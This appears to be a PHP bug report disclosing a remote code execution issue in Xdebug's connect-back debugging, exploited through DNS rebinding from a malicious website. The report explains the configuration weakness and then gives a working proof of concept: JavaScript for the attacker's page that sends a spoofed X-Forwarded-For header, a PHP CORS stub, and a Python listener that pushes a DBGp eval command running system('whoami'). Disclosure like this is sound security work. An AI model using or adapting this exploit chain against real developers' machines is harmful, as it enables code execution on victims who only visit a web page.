Description:
------------
A php programmer who use xdebug's remote debugging feature may affects RCE when he just access to attacker's website in modern browsers. The detail as follows.

As in the doc(https://xdebug.org/docs/all_settings#remote_connect_back) of xdebug, if `xdebug.remote_connect_back` is enabled, the `xdebug.remote_host setting` is ignored and Xdebug will try to connect to the client that made the HTTP request. It checks the `$_SERVER['HTTP_X_FORWARDED_FOR']` and `$_SERVER['REMOTE_ADDR']` variables to find out which IP address to use.

If xdebug is configured as follows, we can use `$_SERVER['HTTP_X_FORWARDED_FOR']` as the connect back ip.
```
xdebug.remote_connect_back = 1
xdebug.remote_enable = 1
xdebug.remote_log =  /tmp/test.log
```

For php programmers, they always setup a local environment and enable xdebug to debug php programs. If we can send a http request with `X-Forwarded-For` header(which points to attacker's server) to local url just like `http://127.0.0.1/index.php` or `http://127.0.0.1/config.php` then attacker can get a xdebug's connect back and then use DBGp commands to execute any php code.

As we all know, to send special request headers using ajax in browsers, ajax first send an `OPTIONS` request to the target url and we need `Access-Control-Allow-Headers: X-Forwarded-For` in the response headers, but there always no such a header in the local program.

There is a tech called dns rebinding. Attacker can setup a private dns server and make a domain first resolved to attacker's ip and then 127.0.0.1 . The victim first access attacker's domain in the browser, pull payloads from attacker's server and then DNS changed to 127.0.0.1 and the browser launch the exploit to 127.0.0.1 . As the domain do not change, the browser's security features are still obeyed, but the exploit is send to 127.0.0.1.

The urls referenced
https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface
https://medium.com/0xcc/visual-studio-code-silently-fixed-a-remote-code-execution-vulnerability-8189e85b486b

Test script:
---------------
The payload used in attacker's website.
```js
<script type="text/javascript">
function exp(url, remote){
	var invocation = new XMLHttpRequest();
	invocation.open('GET', url, true);
	invocation.setRequestHeader('X-Forwarded-For', remote);
	invocation.onreadystatechange = function(){};
	invocation.send();
}
url = 'http://attacker-domain-with-dns-rebind/index.php?XDEBUG_SESSION_START';
remote = '8.8.8.8' // attacker's server ip  
exp(url, remote)
setInterval(function(){exp(url, remote)}, 1000)
</script>
```

The payload for attacker's index.php.
```php
<?php
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: X-Forwarded-For');
```

The payload for xdebug's connect back.
```py
#!/usr/bin/python2
import socket

ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
    client_data = conn.recv(1024)
    print(client_data)

    data = """system('whoami');"""
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))
```